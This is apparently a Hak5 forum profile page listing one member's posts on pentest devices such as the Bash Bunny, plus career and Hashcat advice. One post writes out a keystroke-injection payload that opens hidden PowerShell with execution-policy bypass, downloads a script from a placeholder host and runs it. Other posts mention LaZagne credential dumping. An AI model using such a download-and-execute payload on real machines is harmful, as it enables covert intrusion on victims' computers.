Jump to content

dark_pyrro

Dedicated Members
  • Posts

    2,733
  • Joined

  • Last visited

  • Days Won

    203

Everything posted by dark_pyrro

  1. Perhaps some of the official EU resellers will ship to that country. Not sure of what restrictions that might be in place between EU and Israel though. Email them and ask.
  2. It doesn't really matter where you begin if you don't know what you want to focus on when it comes to cybersec. Just like in AiW; "If you don't know where you're going, any road will take you there." It's such a large area of expertise that you have to focus on certain areas, you will most likely not be able to cover all of it anyway. Also select topics to develop knowledge in from any tech environments that the potential customers and engagements are most likely to be using. I think that the very base of things is to be good at the tech itself (and the business supported by the tech used). If you don't know OS:es, scripting, programming, networking, AD, etc. etc. chances are that you won't be very good at doing cybersec related stuff. You have to understand all the "layers" to be successful. Don't start with the "hacking" perspective. Start with using computers and what surrounds them. That's what you need to learn to be good at cybersec things. Kali, BlackArch, or whatever doesn't really matter as I see it. Some things will be a bit easier for sure since tools are available/installed, but you could use almost any OS/distro and add what's needed at each given moment. I most often use Kali when I feel the need for it, but is it because it's the best distro...? I haven't evaluated that at all and I don't feel that there's any need for it. Just spin up anything and use it. Selecting a programming language to learn just to create tools isn't something that I think you should focus on at this stage. If you've reached the point when you are skilled at such a level that you are developing your own tools, you know by your own experience what to use and that situation is not what you are in right now. Leave that for the future (if you ever need to get there). You also have a dedicated thread that is pinned to the top of this section of the forums that deals with the subject
  3. There's always the official documentation. I'd suggest reading all of it. https://docs.hak5.org/bash-bunny/
  4. Something like this ATTACKMODE HID QUACK DELAY 3000 QUACK GUI r QUACK DELAY 500 QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl QUACK ENTER Perhaps also wrap the powershell line in quote marks and escape the dollar char as well QUACK STRING "powershell -w h -NoP -NonI -ep Bypass \$pl = iwr 'https://redacted.site/pl.ps1'; iex \$pl"
  5. Yes, you need to QUACK things. The author is a competent user, so I'm not sure why it has been forgotten. Perhaps too quickly "converting" it from the USB Rubber Ducky to the Bunny.
  6. It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything. So... add ATTACKMODE HID to the top of the payload file To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny. However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact.
  7. What payloads are you using in each switch position?
  8. https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii#storage
  9. I can't answer to how quality checks are made in the factory before delivery. You have to ask Hak5 about that, but I'm pretty sure it's not a situation they want.
  10. Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny? Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all.
  11. Even if 1.1.1 works fine, there's still a potentially faulty flash storage device, and you don't want that. Just because you're running 1.1.1 doesn't make it go away, it's still there. https://hak5.customerdesk.io/
  12. You can't really decrypt a handshake since it's not reversible that way, but you can crack it. Semantics really... Using Wireshark won't increase your chances. I would ditch that approach fully. Best bet is probably to use Hashcat, but there's no 100% success rate. If the methods used aren't able to find the passphrase, it just simply won't. Since I assume that you're doing this against a network that you have permission to "attack", then you also know the secret already. To get an understanding how things work when it comes to the use of Hashcat, then just create a wordlist that contains the secret/passphrase and run it with Hashcat and it will successfully do the "cracking".
  13. Could be a faulty flash storage device. It has happened before to users. Using firmwares before 2.x works since it didn't have built in checks for faulty flash devices, but as it was introduced in 2.x you might get that kind of error if upgrading to those firmware versions. I would suggest submitting a support ticket.
  14. Are you trying to use the module(s) before the dependencies have been installed properly? Other users have gotten this kind of error when they try to use the module before it's really ready to be used. So, try to install the module. Click on the module and let it sit for a while when dependencies are being installed. Then try to use the module.
  15. If it stops after the execution of Then, I would probably focus on the line The part is more commonly used (according to my experience) on a Ducky to get a drive letter. So, either you most likely need to wrap it in quotes and also escape special chars, or use another way of obtaining the Bunny drive letter using a PowerShell session instead.
  16. I'd suggest that you open an issue report on the GitHub of the LaZagne creator. That doesn't seem payload, or Bunny, related. It's sounds more like something to do with Python (since the LaZagne exe seems to be Python based and that an exe is created using pyinstaller or such).
  17. yes, there were, you just presented one on Discord, it's rather difficult to try to help troubleshooting when asking for errors and getting reports back there are none, and... still there are...
  18. What evil portal are you using? Something you created yourself or some pre-made ones?
  19. Could be related to what has been described in what was the topmost thread in the Turtle section of the forums when you created your thread https://forums.hak5.org/topic/61057-trying-to-factory-reset-lan-turtle/ I.e. if it's brand new and doesn't behave, then submit a support ticket.
  20. So, if you run that payload but remove -windowstyle hidden and instead add -NoExit, will it show any errors in the PowerShell window as the ps1 file has been executed?
  21. The green LED doesn't really say anything about if the payload was successful or not in this particular case. It just tells you that it has kicked off the ps1 file and waited 10 seconds. You have to be more detailed about the "scenario". For example; What Windows version is the target running? Is the A-V disabled? If it's not disabled, how did you make sure that the "malicious" exe isn't detected and eliminated? Did you try to run the exe manually on the target to verify that it at all works as expected?
  22. No one knows. Not even Hak5 officials. Dragorn posted the following just yesterday on Discord. "The radios used are still not available; there is no ETA for them being available, if they ever are again."
  23. Ask Ducky questions in the Ducky section of the forums (and read the documentation)
  24. From where are you trying to download the firmware file (not from what place in terms of the origin of the file, but whereto you are trying to download it)? OS of the device where you're trying to download the file (if it's not the Pineapple itself)? Are you trying to download from some country that has restrictions on what services that are allowed to being used (like Google from a country which name, for example, begins with "Ch" and ends with "ina")?
×
×
  • Create New...